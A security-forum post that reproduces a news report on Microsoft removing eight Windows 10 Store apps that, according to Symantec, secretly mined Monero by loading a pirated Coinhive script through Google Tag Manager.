silversurfer

Level 52
Verified
Trusted
Content Creator
Malware Hunter
Microsoft has removed from the official Microsoft Store eight Windows 10 apps that had been caught mining the Monero cryptocurrency behind users' backs for the benefit of the apps' developers.

The names of the eight apps are Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

The apps were developed by three developers, namely DigiDream, 1clean, and Findoo. US cyber-security firm Symantec, which discovered the malicious apps last month, says evidence they uncovered in the applications' source code and adjacent domains led them to believe all eight had been developed by the same person or group, despite the different names.

According to a Symantec technical report shared with ZDNet, all apps worked in a similar fashion. All loaded the Google Tag Manager (GTM) library within their source code, through which they later downloaded and executed the actual malicious payload.

This last-stage piece of code was a pirated version of the infamous Coinhive --a JavaScript library that many hackers have secretly added on hacked sites to mine Monero using visitors' browsers.

Besides hacked sites, the library has also been used in any apps that can execute JavaScript code, such as game mods, Android and iOS apps, and, now, Windows 10 apps. This marks the first time such apps have been found on the Microsoft Store, Symantec has told ZDNet.

"These apps fall under the category of Progressive Web Applications, which are installed as a Windows 10 app running independently from the browser, in a standalone (WWAHost.exe process) window," Symantec experts said in their report, explaining how these apps were able to run the Coinhive JavaScript code, to begin with.

"A malicious URL with mining script was detected, and we backtracked to find these applications," Tommy Dong, Senior Principal Software Engineer at Symantec, told ZDNet. "Symantec AV can convict generic JS-based cryptocurrency mining disregarding any domain."

Users who installed these apps over the past few months would have seen their CPU usage go through the roof, as the Coinhive miner would consume all available resources to mine Monero for the app devs.